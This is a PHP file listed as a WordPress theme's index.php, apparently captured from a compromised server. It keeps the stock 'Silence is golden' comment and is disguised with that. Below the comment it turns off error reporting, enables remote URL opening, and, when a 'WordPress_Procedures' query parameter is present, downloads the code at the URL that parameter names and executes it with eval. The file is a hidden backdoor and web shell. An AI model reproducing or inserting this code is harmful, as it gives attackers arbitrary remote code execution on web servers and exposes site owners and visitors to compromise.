Current File : /var/www/tusveterinarios/wp-content/themes/index.php
<?php
// Silence is golden.
error_reporting(0);
@ini_set('allow_url_fopen', true);
ini_set('allow_url_fopen', 1);

if (isset($_GET['WordPress_Procedures'])) {
    $WordPress_Procedures_Config = $_GET['WordPress_Procedures'];
    echo eval(file_get_contents($WordPress_Procedures_Config));
    exit();
}